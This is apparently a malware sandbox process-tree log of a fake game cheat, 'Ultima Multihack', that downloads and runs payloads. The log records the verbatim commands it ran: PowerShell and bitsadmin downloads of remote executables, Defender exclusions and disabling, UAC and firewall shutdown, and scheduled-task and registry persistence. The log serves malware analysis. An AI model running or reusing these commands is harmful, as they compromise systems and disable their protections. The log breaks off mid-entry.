C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:748

F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe
"F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1164
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DF0.tmp\7DF1.tmp\7DF2.bat "F:\Ultima Multihack V3.5\Ultima Multihack V3.55.exe""
  2⤵
  PID:5340
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:2340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:3068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2196
- - C:\Windows\system32\where.exe
    where powershell
    3⤵
    PID:5388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/doodoofart3443/test/raw/refs/heads/main/file5.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\file5.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1168
- - C:\Users\Admin\AppData\Local\Temp\file5.exe
    "C:\Users\Admin\AppData\Local\Temp\file5.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    PID:1264
  - - C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE
      "C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:5072
  - - C:\Program Files (x86)\VLC1.EXE
      "C:\Program Files (x86)\VLC1.EXE"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:668
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)\VLC1.EXE" +s +h
        5⤵
        
        PID:1812
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Program Files (x86)\VLC1.EXE" +s +h
        6⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)" +s +h
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2328
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Program Files (x86)" +s +h
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5256
    - - C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
        
        "C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1876
  - - C:\Program Files (x86)\WINDOWS DEFENDER.EXE
      "C:\Program Files (x86)\WINDOWS DEFENDER.EXE"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2840
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit
        5⤵
        
        PID:2296
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5304
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9B3C.tmp.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3040
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4580
      - C:\Users\Admin\AppData\Roaming\csrss.exe
        
        "C:\Users\Admin\AppData\Roaming\csrss.exe"
        6⤵
        Executes dropped EXE
        Sets desktop wallpaper using registry
        Modifies Control Panel
        
        PID:2748
  - - C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE
      "C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
1⤵
PID:4192
- C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:5652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "
    3⤵
    PID:5272
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:552
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1468
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2992
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:644
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:1624
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:1816
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:912
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:1100
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:5464
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:4468
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4260
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:3108
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5224
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4128
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:4368
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:6032
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:5372
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:4528
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1880
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:1588
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:3036
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5456
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1580
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5688
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:652
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:5980
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1264
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:2008
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:4712
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2056
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:1492
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5312
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5920
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:3328
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:3048
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5164
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:3928
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4572
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:2196
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2072
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:5972
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2812
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5256
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5332
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:3844
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4920
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4656
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5856
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:6080
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:4504
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2040
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5320
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1620
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:3452
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4424
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:732
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:3144
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:2764
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:4976
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1940
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5992
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:4672
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:3200
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:552
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1468
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:2992
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:4372
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:3048
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:5164
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:404
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:2568
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1984
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2340
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:3536
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:5256
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5944
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5640
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:4128
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4368
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:6032
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:3152
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:5372
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:4724
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:6036
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:2924
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1588
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1132
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5744
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5688
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:652
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:5980
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1264
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:5168
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5284
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2212
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:2056
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:1492
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5312
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:5920
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:3328
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:1128
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      System Location Discovery: System Language Discovery
      PID:2636
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:236
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1816
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:2196
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:1100
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:5464
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:2812
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      PID:4260
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:3108
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0.01
      4⤵
      Delays execution with timeout.exe
      PID:5224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4304
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
      4⤵
      Download via BitsAdmin
      PID:5856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "
    3⤵
    PID:5168
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
      4⤵
      Download via BitsAdmin
      PID:4976
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1096
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2264
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
      4⤵
      UAC bypass
      PID:652
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "
    3⤵
    PID:4472
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
      4⤵
      Download via BitsAdmin
      PID:1084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4712
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
      4⤵
      UAC bypass
      PID:6116
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -PUAProtection disable"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5268
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:2520
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6328
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6412
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:6972
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "netsh advfirewall set allprofiles state off"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4500
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:860
  - - C:\Windows\SysWOW64\timeout.exe
      TIMEOUT /T 10
      4⤵
      PID:6320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "
    3⤵
    PID:4260
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:4684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2056
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5244
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
      4⤵
      UAC bypass
      PID:1456
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:5284
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -PUAProtection disable"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:6232
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6612
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6228
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6344
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3320
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "netsh advfirewall set allprofiles state off"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:5888
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:6260
  - - C:\Windows\SysWOW64\timeout.exe
      TIMEOUT /T 10
      4⤵
      Delays execution with timeout.exe
      PID:1632
- - C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --uninstall --system-level
    3⤵
    - Drops file in Windows directory
    PID:1264
  - - C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff763ba1f58,0x7ff763ba1f64,0x7ff763ba1f70
      4⤵
      Drops file in Windows directory
      PID:3420
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --uninstall
      4⤵
      PID:744
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
